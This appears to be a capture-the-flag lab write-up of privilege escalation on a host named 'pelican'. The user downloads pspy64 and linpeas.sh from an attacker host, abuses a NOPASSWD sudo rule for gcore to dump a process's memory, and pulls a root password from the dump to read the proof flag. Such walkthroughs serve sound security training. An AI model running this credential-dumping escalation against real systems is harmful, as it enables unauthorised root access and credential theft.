Privilege Escalation

charles@pelican:~$ sudo -l
sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore
$ cat /etc/crontab
$ python -m http.server 80

Obtain a second shell

charles@pelican:/dev/shm$ wget 192.168.45.233/pspy64
wget 192.168.45.233/pspy64
--2024-08-30 21:20:37--  http://192.168.45.233/pspy64
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M  2.67MB/s    in 1.1s    

2024-08-30 21:20:38 (2.67 MB/s) - ‘pspy64’ saved [3104768/3104768]
charles@pelican:~$ wget 192.168.45.233/linpeas.sh
--2024-08-30 21:24:32--  http://192.168.45.233/linpeas.sh
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860335 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 840.17K  1.80MB/s    in 0.5s    

2024-08-30 21:24:32 (1.80 MB/s) - ‘linpeas.sh’ saved [860335/860335]

charles@pelican:~$ chmod +x linpeas.sh 
charles@pelican:~$ ./linpeas.sh 

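The path is now clear. The `sudo -l` output above lets charles run /usr/bin/gcore as any user without a password, and gcore writes a core dump of a running process's memory. Any credential that process holds in memory therefore ends up in a file charles can read, as the dump below shows. On the defensive side, a sudoers rule for a memory-dump tool should be treated as equivalent to root access and removed.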

charles@pelican:~$ sudo /usr/bin/gcore 10960
0x00007f27e77736f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffe69bbda30, remaining=remaining@entry=0x7ffe69bbda30) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28	../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.10960
[Inferior 1 (process 10960) detached]
charles@pelican:~$ strings core.10960
ClogKingpinInning731
charles@pelican:~$ su root
Password: 
root@pelican:/home/charles# whoami
root
root@pelican:/home/charles# cat /root/proof.txt 
b7f3b04ee25ad19e999a553bfca65b68
root@pelican:/home/charles# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:bf:86:28 brd ff:ff:ff:ff:ff:ff
    inet 192.168.229.98/24 brd 192.168.229.255 scope global noprefixroute ens192
       valid_lft forever preferred_lft forever
root@pelican:/home/charles# 
